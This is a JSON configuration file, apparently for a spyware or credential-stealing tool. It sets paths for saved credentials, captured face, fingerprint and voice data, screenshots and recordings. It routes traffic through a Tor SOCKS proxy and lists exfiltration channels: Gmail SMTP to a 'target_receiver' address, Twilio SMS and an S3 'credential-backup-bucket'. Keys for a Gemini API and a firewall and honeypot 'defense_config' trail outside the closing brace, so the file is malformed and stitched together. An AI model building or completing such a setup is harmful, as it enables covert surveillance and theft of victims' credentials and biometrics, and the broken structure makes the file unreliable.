{
  "local_output_path": "outputs/saved_credentials.txt",
  "biometrics_config": {
    "reference_face": "outputs/biometrics_data/reference_face.jpg",
    "reference_fingerprint": "outputs/biometrics_data/reference_print.png",
    "audio_sample_dir": "outputs/biometrics_data/audio/"
  },
  "media_output": {
    "screenshots_dir": "outputs/screenshots/",
    "recordings_dir": "outputs/recordings/"
  },
  "proxy": {
    "enabled": true,
    "http": "socks5://127.0.0.1:9050",
    "https": "socks5://127.0.0.1:9050"
  },
  "smtp": {
    "server": "smtp.gmail.com",
    "port": 587,
    "sender_email": "your_email@gmail.com",
    "sender_password": "your_app_password",
    "recipient_email": "target_receiver@gmail.com"
  },
  "twilio": {
    "account_sid": "your_twilio_sid",
    "auth_token": "your_twilio_auth_token",
    "from_number": "+15555550123",
    "to_number": "+15555550199"
  },
  "aws_s3": {
    "bucket_name": "your-credential-backup-bucket",
    "region": "us-east-1"
  }
}
  "ai_config": {
    "gemini_api_key": "YOUR_GEMINI_API_KEY",
    "model_version": "gemini-pro"
  },
  "defense_config": {
    "firewall": {
      "blocked_ips": ["192.168.1.100", "10.0.0.5"],
      "max_connections_per_ip": 5
    },
    "honeypots": {
      "ssh_port": 2222,
      "web_port": 8080,
      "ftp_port": 2121
    }
  }
